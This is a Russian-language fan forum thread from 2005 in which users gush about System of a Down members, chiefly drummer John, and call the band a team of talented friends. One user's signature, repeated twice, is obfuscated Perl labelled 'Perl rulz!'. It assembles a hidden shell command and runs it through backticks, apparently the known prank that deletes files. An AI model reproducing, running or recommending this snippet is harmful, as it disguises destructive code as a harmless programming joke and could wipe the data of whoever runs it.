Добавлено: Вт Окт 18, 2005 12:17 am Заголовок сообщения:
Серж, Серж и еще раз Серж, правда мне не оч. нравится его имидж последнего времени... А если подумать, то на мой взгляд чисто внешне самый симпатичный из них Джон
Добавлено: Вт Окт 18, 2005 1:06 am Заголовок сообщения:
[re:]venge писал(а):
на мой взгляд чисто внешне самый симпатичный из них Джон
и на мой тоже)) у меня при виде длинноволосого джона учащается сердцебиение, поднимается пульс и едет крыша)))) еще он ОТЛИЧНЫЙ барабанщик, а если дает интервью, то говорит не много, но прямо, не перебивая товарищей(типо как шаво=))) и по существу
каждый член (банды) по-своему уникален и неповторим, что и делает группу тем, чем она является, - !командой! талантливых друзей-армян, не перестающими удивлять окружающих и даже иногда самих себя,... и без кого-то одного это будет уже не соад
у меня при виде длинноволосого джона учащается сердцебиение, поднимается пульс и едет крыша))))
Угу, у меня тоже Но меня особенно возбуждает вид Джона когда пересматриваю Forest live @ Reading festival 2003: там у него волосы еще не очень длинные и кучерявые - ммм, лапочка-очаровашка! Кхе-кхе, ну че-та я загоняюсь вощем...
ALuserX писал(а):
каждый член (банды) по-своему уникален и неповторим, что и делает группу тем, чем она является, - !командой! талантливых друзей-армян, не перестающими удивлять окружающих и даже иногда самих себя,... и без кого-то одного это будет уже не соад
2
я кстати нарочно слово "банды" в скобки взял _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Последний раз редактировалось: ALuserX (Вт Окт 18, 2005 8:32 pm), всего редактировалось 1 раз
ага, а ты еще фоток запости _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!